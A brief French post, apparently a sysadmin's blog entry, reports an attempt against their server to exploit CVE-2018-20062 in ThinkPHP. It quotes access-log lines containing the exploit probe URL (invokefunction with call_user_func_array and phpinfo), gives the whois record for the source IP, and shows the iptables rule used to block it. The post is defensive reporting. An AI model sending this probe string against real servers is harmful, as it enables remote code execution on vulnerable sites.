Je viens de voir dans mes logs une tentative l’utilisation de la faille : CVE-2018-20062 .
Dans les logs cela donne :
121.5.155.158 - - [13/Oct/2021:07:16:18 +0200] "GET /TP/public/index.php HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.5.155.158 - - [13/Oct/2021:07:16:19 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50/TP/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.5.155.158 - - [13/Oct/2021:07:16:19 +0200] "GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.5.155.158 - - [13/Oct/2021:07:16:20 +0200] "GET /user/auth/login HTTP/1.1" 200 8187 "http://80.15.48.50/TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.5.155.158 - - [13/Oct/2021:07:16:20 +0200] "POST /TP/public/index.php?s=captcha HTTP/1.1" 302 215 "-" "Go-http-client/1.1" 121.5.155.158 - - [13/Oct/2021:07:16:21 +0200] "GET /user/auth/login HTTP/1.1" 200 8189 "http://80.15.48.50/TP/public/index.php?s=captcha" "Go-http-client/1.1" 121.5.155.158 - - [13/Oct/2021:07:16:22 +0200] "GET / HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 121.5.155.158 - - [13/Oct/2021:07:16:22 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50:80" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
L’adresse IP : 121.5.155.158 est en chine :
route: 121.4.0.0/15
origin: AS45090
descr: China Internet Network Information Center
Floor1, Building No.1 C/-Chinese Academy of Sciences
4, South 4th Street
Haidian District,
mnt-by: MAINT-CNNIC-AP
last-modified: 2020-02-25T01:14:09Z
source: APNIC
La meilleure action à faire, c’est donc :
# iptables -A INPUT -s 121.5.155.158 -j DROP # /usr/sbin/iptables-save > /etc/iptables/rules.v4
Au suivant …